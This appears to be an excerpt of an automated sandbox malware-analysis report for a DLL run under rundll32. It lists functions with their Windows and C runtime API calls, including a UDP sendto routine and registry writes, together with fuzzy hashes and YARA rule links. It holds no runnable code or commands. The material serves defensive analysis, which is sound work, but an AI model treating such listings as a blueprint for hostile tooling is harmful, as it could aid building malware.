Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual
String ID: Ot
API String ID: 190046822-718333598
Opcode ID: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction ID: 2d2bd09531cc21cd0688133637c85df5768d7ec480326e7220fdcfa052c0fbce
Opcode Fuzzy Hash: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction Fuzzy Hash: 2F317474A00208EFDB05DF94C685B9EB7B6FB48344F24C298E9055B395CB75AF41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10024E13, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10024E1A

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

__CxxThrowException@8.LIBCMT ref: 10024E50
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B

Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88

LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291A4
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291CF
GetCapture.USER32 ref: 100291E1
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 100291F0

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
swprintf.LIBCMT ref: 1002AC34
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8

Uniqueness

Uniqueness Score: -1.00%

Function 10027E7D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 10027E8D
GetTopWindow.USER32(00000000), ref: 10027ECC
GetWindow.USER32(00000000,00000002), ref: 10027EEA

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 10027846
GetTopWindow.USER32(00000000), ref: 10027859

Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0

GetTopWindow.USER32(?), ref: 10027889

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,04057276), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,04057276), ref: 100235D9

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65

Uniqueness

Uniqueness Score: -1.00%

Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 100337DB

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 100337F2
__amsg_exit.LIBCMT ref: 10033800
__lock.LIBCMT ref: 10033810

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499

__getptd.LIBCMT ref: 1003786D

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003787B

Strings

csm, xrefs: 10037889

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
